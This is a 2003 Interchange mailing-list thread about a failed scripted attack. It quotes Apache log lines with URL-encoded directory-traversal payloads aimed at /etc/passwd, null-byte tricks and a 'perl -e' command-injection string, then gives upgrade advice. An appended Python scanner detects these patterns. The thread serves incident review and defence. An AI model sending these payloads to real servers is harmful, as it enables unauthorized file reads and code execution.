[ic] Hack attempt on IC 4.8.6

Ryan Grace ryan at ryangrace.com
Sat Nov 15 10:17:50 EST 2003


On Sat, 15 Nov 2003, Ed LaFrance wrote:

> At 10:35 PM 11/14/2003 -0800, you wrote:
> > From what I can tell this person was unsuccessful.  My IC and Apache
> > logs show multiple attempts to grab my passwd file by inserting many
> > ../../../../../'s in the URLs and attempts to execute arbitrary perl code
> > by manipulating URL parameters.  Here are a few lines:
> >
> >66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET
> >/hya/index.html?id=%2e%2e%2f%
> >2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
> >%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
> >f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible;
> >MSIE 4
> >.0; Windows 95)"
> >66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET
> >/hya/index.html?id=foo%3bfoo%
> >7cperl%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00
> >HTTP/1.0" 403
> >  82 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
> >66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=
> >HTTP/1.0"
> >  200 8162 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
> >66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id=
> >HTTP/1.0"
> >  200 8162 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
> >66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
> >/hya/customerservice?mv_sessi
> >on_id=6MZFj58R&mv_pc=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2
> >e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%
> >2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&spg=customerservice
> >HTT
> >P/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
> >66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
> >/hya/customerservice?mv_sessi
> >on_id=6MZFj58R&mv_pc=1&spg=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
> >f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%
> >2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0"
> >302 39
> >"-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
> >66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET
> >/hya/customerservice?mv_sessi
> >on_id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2
> >e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
> >2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&mv_pc=1&spg=customerservice
> >HTTP/1.0"
> >403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
> >
> >Sorry for the weird wrapping.  The log goes on and on like this.
> >
> >Has anyone else seen this kind of attempt?  It looks like a script judging
> >by the rapidity of the accesses.
> >
> >Ryan
>
> I just grep'd the logs on a couple of servers for matching substrings and
> came up empty. I get the impression that this attempt was targeted
> specifically at interchange. There was a vulnerability in the 4.8 branch
> which could allow arbitrary file reads with a technique like this, but it
> was fixed, so if you are running 4.8.7 or higher you should be ok. If you
> are running an earlier version, I strongly recommend an upgrade.
>
> - Ed
>

Thanks for the reply, Ed.  I've grepped out the lines matching the source IP from my access_log and can make that file available to anyone who wants to check it out.

I'll be upgrading soon, then.  I'm currently running 4.8.6.

Thanks,

Ryan
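The kind of log review discussed in this thread, as an added example that is not part of the original posts: it decodes each query parameter in Apache combined-log lines and flags the signals seen above (encoded `../` traversal, the trailing `%00` null byte, and shell metacharacters around `perl -e`). The sample lines and the IP address are constructed, modelled on the thread's entries.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Apache combined log format, as shown in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Constructed sample lines modelled on the thread's entries (IP is a documentation address).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0"
203.0.113.5 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=foo%3bfoo%7cperl%20%2de%20%27print%22roo%22%27%26%26foo%00 HTTP/1.0" 403 82 "-" "Mozilla/4.0"
203.0.113.5 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=6MZFj58R&mv_pc=1&spg=customerservice HTTP/1.0" 200 8162 "-" "Mozilla/4.0"
"""

def suspicious_params(url):
    """Decode each query parameter and list the attack signals it carries."""
    findings = {}
    for pair in urlsplit(url).query.split("&"):   # split before decoding, so %26 stays inside a value
        name, _, value = pair.partition("=")
        raw = unquote_to_bytes(value)               # %2e%2e%2f -> b"../", %00 -> a real NUL byte
        signals = []
        if b"../" in raw or b"..\\" in raw:
            signals.append("traversal")
        if b"\x00" in raw:
            signals.append("null-byte")             # classic C-string truncation trick
        if re.search(rb"[;|&`]", raw):
            signals.append("shell-metachar")        # command-injection attempt
        if signals:
            findings[name] = signals
    return findings

def scan_log(text):
    """Return (ip, status, findings) for every request carrying a suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = suspicious_params(m["url"])
        if findings:
            hits.append((m["ip"], int(m["status"]), findings))
    return hits

if __name__ == "__main__":
    for ip, status, findings in scan_log(SAMPLE_LOG):
        # A 2xx status here means the request was served rather than refused: investigate.
        print(f"{ip} status={status} {findings}")
```

The status code is kept alongside each finding because, as the thread notes, a 403 or 302 on such a request is reassuring while a 200 on the same parameters is what warrants a closer look.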


More information about the interchange-users mailing list